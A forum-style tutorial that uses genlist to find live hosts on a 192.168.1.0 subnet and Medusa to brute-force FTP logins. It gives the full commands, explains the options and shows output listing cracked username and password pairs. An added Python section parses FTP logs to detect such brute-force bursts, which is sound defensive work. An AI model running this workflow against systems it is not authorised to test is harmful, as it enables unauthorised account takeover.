This guide shows how to use Medusa against FTP, or any other service that Medusa supports, to check for weak login credentials.
I will be using genlist to compile a list of the live hosts on the network and write the result to a text file that Medusa can use to run a brute-force attack against all live hosts.
I'll start with the routing table to find the range the network is using.
Code:
mohamedx@kl:~# route -n |grep eth1
192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
0.0.0.0 192.168.1.254 0.0.0.0 UG 0 0 0 eth1
mohamedx@kl~#
In the example above, the network I am connected to uses the IP range 192.168.1.0 and the default gateway 192.168.1.254, so I will scan the whole subnet for live hosts with genlist.
Code:
mohamedx@kl:~# genlist -s 192.168.1.\* > host_c-intruder3s
mohamedx@kl:~# cat host_c-intruder3s
192.168.1.67
192.168.1.68
192.168.1.69
192.168.1.77
192.168.1.78
192.168.1.101
192.168.1.254
mohamedx@kl:~#
Now that I have a list of live hosts, I can move on to Medusa.
Code:
medusa -v 6 -H host_c-intruder3s -U username.txt -P pwords.txt -M ftp
- Medusa Options
Code:
-v verbosity level (6 here)
-H file with the list of hosts
-U file with the list of usernames
-P file with the list of passwords
-M module to use: ftp, telnet, ssh, http, etc.
Note: for this tutorial I will only use a small username/password list to save time.
My output:
mohamedx@kl: ~ # medusa -v 6 -H host_c-intruder3s -U username.txt -P pwords.txt -M ftp | grep "ACCOUNT FOUND"
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
ACCOUNT FOUND: ftp Host: 192.168.1.67 User: zerocold Password: password123 SUCCESS
ACCOUNT FOUND: ftp Host: 192.168.1.67 User: offsec Password: password SUCCESS
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.
ACCOUNT FOUND: ftp Host: 192.168.1.68 User: michael Password: jhonadmin SUCCESS
ACCOUNT FOUND: ftp Host: 192.168.1.77 User: rafael Password: admin123 SUCCESS
mohamedx@kl: ~ #
In the previous example I piped the output through | grep "ACCOUNT FOUND" to cut most of it, so I only receive the user names and passwords. If I were doing this against an actual target rather than my home network, I would run it normally so I can see how far along the attack is.
greetings // M.Ahmed
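Seen from the server side, a run like the one above appears in the FTP log as a burst of failed logins from one client across several usernames. The following is an added example, not part of the original post: it parses log lines in an assumed vsftpd-style format, flags such a source and lists accounts that logged in after the guessing began. The sample lines, client addresses, thresholds and function name are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed vsftpd-style log format; adjust the regex for other FTP daemons.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

# Constructed sample: one source guessing logins, one user mistyping once.
SAMPLE_LOG = """\
Sat Mar  2 10:15:01 2024 [pid 311] [root] FAIL LOGIN: Client "192.168.1.50"
Sat Mar  2 10:15:02 2024 [pid 312] [admin] FAIL LOGIN: Client "192.168.1.50"
Sat Mar  2 10:15:02 2024 [pid 313] [offsec] FAIL LOGIN: Client "192.168.1.50"
Sat Mar  2 10:15:03 2024 [pid 314] [zerocold] FAIL LOGIN: Client "192.168.1.50"
Sat Mar  2 10:15:04 2024 [pid 315] [zerocold] FAIL LOGIN: Client "192.168.1.50"
Sat Mar  2 10:15:05 2024 [pid 316] [offsec] FAIL LOGIN: Client "192.168.1.50"
Sat Mar  2 10:15:06 2024 [pid 317] [zerocold] OK LOGIN: Client "192.168.1.50"
Sat Mar  2 10:20:11 2024 [pid 320] [michael] FAIL LOGIN: Client "192.168.1.20"
Sat Mar  2 10:20:19 2024 [pid 321] [michael] OK LOGIN: Client "192.168.1.20"
""".splitlines()

def detect_bruteforce(lines, max_fails=5, window=timedelta(minutes=1)):
    """Flag clients with more than max_fails failed logins inside one window."""
    events = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            events[m["ip"]].append((ts, m["user"], m["result"]))
    alerts = {}
    for ip, evs in events.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if e[2] == "FAIL"]
        start, burst = 0, False
        for end in range(len(fails)):  # sliding window over failure times
            while fails[end][0] - fails[start][0] > window:
                start += 1
            burst = burst or end - start + 1 > max_fails
        if burst:
            alerts[ip] = {
                "fails": len(fails),
                "users": {u for _, u, r in evs if r == "FAIL"},
                # a success after guessing began: treat the password as known
                "compromised": {u for t, u, r in evs
                                if r == "OK" and t >= fails[0][0]},
            }
    return alerts
```

Accounts listed under "compromised" are the ones to lock and reset first; the single mistyped login from the second client stays below the threshold and is not flagged.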
3 Responses
Hi, what exactly is Medusa?
darknet.org.uk/2006/05/medusa-password-cracker-version-11-now-available-for-download/ Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible